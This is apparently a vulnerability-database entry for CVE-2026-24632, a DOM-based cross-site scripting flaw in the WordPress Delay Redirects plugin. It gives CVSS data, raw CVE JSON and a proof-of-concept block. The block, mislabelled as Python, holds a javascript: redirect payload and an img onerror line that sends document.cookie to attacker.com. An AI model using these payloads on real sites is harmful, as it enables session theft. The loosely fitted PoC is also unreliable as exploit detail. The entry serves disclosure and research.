Security Vulnerability Report
中文
CVE-2026-24632 CVSS 5.9 MEDIUM

CVE-2026-24632

Published: 2026-01-23 15:16:23
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jagdish1o1 Delay Redirects delay-redirects allows DOM-Based XSS.This issue affects Delay Redirects: from n/a through <= 1.0.0.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WordPress Delay Redirects (delay-redirects) 插件所有版本 <= 1.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2026-24632 PoC - DOM-based XSS in WordPress Delay Redirects Plugin --> <!-- This PoC demonstrates how an attacker can inject malicious JavaScript through the plugin --> <!-- Attack URL - crafted with XSS payload in redirect parameter --> <!-- Replace 'your-site.com' with the target WordPress site URL --> <script> // Generate malicious URL with XSS payload const targetUrl = 'http://your-site.com/?redirect=' + encodeURIComponent('javascript:alert(document.cookie)'); // Log the attack URL console.log('Malicious URL:', targetUrl); // Display the PoC document.write('<h2>CVE-2026-24632 PoC</h2>'); document.write('<p>Target: WordPress Delay Redirects Plugin <= 1.0.0</p>'); document.write('<p>Vulnerability: DOM-based XSS</p>'); document.write('<p>Attack URL:</p>'); document.write('<input type="text" value="' + targetUrl + '" style="width:100%" readonly>'); </script> <!-- Alternative PoC using img onerror --> <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"> <!-- Real attack scenario: --> <!-- 1. Attacker crafts a malicious URL with XSS payload --> <!-- 2. Lures victim to click the link via phishing email or other means --> <!-- 3. When victim visits the page, malicious JavaScript executes --> <!-- 4. Attacker steals session cookies or performs actions on behalf of victim -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24632", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:22.697", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jagdish1o1 Delay Redirects delay-redirects allows DOM-Based XSS.This issue affects Delay Redirects: from n/a through <= 1.0.0."}, {"lang": "es", "value": "Vulnerabilidad de Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') en jagdish1o1 Delay Redirects delay-redirects permite XSS basado en DOM. Este problema afecta a Delay Redirects: desde n/a hasta &lt;= 1.0.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/delay-redirects/vulnerability/wordpress-delay-redirects-plugin-1-0-0-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}